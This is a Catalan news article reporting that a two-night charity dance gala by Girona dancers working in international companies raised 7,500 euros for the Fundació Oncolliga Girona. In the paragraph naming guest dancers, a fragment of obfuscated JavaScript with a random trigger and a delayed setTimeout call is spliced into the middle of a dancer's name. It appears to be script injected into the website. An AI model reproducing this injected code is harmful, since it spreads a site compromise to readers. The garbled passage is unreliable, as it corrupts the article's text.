La gala de dansa “Ballarins de Girona junts contra el càncer” recapta 7.500 euros per a l’Oncolliga

Comparteix-ho amb els teus amics:

La gala benèfica de dansa impulsada per diferents ballarins gironins que han treballat o treballen en companyies internacionals ha recaptat un total de 7.500 euros que es destinaran a millorar l’atenció psicològica als malalts de càncer i el servei de banc de perruques que ofereix la Fundació Oncolliga Girona.

L’espectacle, titulat “Ballarins de Girona junts contra el càncer”, ha aconseguit omplir durant dos dies consecutius, el 27 i 28 de juliol, el Teatre de Bescanó d’un públic poc avesat a la dansa que ha pogut gaudir de coreografies i interpretacions de primer nivell i d’estils que anaven des del ballet clàssic fins a la dansa contemporània, passant per la dansa espanyola, la dansa sufí o els balls de saló. Les gales, presentades per l’actor i dramaturg Martí Peraferrer, han comptat també amb la presència de l’Esbart Fontcoberta de Banyoles com a grup folklòric convidat.

EL4A0200

En l’espectacle hi han participat ballarins gironins que han fet carrera professional fora de les nostres comarques com David Rodríguez, Marc Balló, Antonio Izquierdo, Tess Buck, Chantal Soler, Andrea Fernández, Virginia Joëlle López i Marià Huguet. Tots ells han treballat o estan treballant actualment en companyies nacionals i internacionals de renom com l’Hamburg Ballet, la Gauthier Dance (Stuttgart) i l’Òpera Nova Bydgoszcz (Polònia) i en aquesta gala benèfica han estat acompanyats d’altres ballarins de les seves respectives companyies com Sandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andra Bourdais, Maurus Gauthier o Luke Prunty. També s’han sumat a la iniciativa joves promeses dels balls de saló de competició, com el gironí Pere Planas i la seva parella de ball, la lleidatana Núria Pérez, de 16 i 14 anys respectivament.

EL4A0390

Amb aquesta iniciativa, els ballarins han volgut posar el seu gra de sorra en la construcció, a través de l’art de la dansa, d’una societat cada vegada més tolerant i compromesa i alhora fer visible el talent dels ballarins gironins entre el públic de casa nostra. “L’estiu passat en un sopar molts ballarins gironins van comentar que no ballem mai a Girona perquè tots estem treballant en companyies d’altres països i vaig pensar que una gala d’aquest tipus podia ser una oportunitat per poder ballar junts davant el públic d’aquí i alhora contribuir a una causa amb la qual estic personalment molt sensibilitzat”, ha explicat David Rodríguez, promotor i alma mater de la iniciativa.

La presidenta de la Fundació Oncolliga Girona, Lluïsa Ferrer, s’ha mostrat molt agraïda per la iniciativa i ha destacat el talent i l’empenta d’aquests joves, que des d’un primer moment van tenir clar que l’espectacle que oferien era prou atraient com per omplir el Teatre de Bescanó durant dues sessions.

Info: Fundació Oncolliga Girona
Fotos: El Beso Photography

Comparteix-ho amb els teus amics: